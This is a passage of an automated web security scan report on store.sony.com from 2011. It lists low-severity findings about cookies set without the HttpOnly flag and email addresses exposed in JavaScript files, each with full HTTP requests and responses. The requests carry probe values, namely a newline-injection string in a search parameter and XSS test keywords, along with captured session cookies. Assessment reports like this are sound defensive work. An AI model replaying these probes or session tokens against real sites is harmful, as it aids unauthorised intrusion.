fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 403 Forbidden
Content-Length: 356
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/
X-N: S

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wcsstore/SonyStyleStorefrontAssetS
...[SNIP]...

5.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2538
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

5.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2226
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

5.4. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYErrorRedirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYErrorRedirect?URL=StoreCatalogDisplay&storeId=10151&langId=-1&catalogId=10551&eid=437018621 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=session#1315352920400-736912#1315354842|PC#1315334914578-928682.19#1316562582|check#true#1315353042; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167; ensUID=249118483jocCbfxsy2s; s_cc=true; s_visit=1; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://store.sony.com:80/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/
Cache-Control: private


5.5. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

5.6. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=xss&x=0&y=0 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 109762
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 109762
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:55 GMT
Connection: close
Set-Cookie: TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

6.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

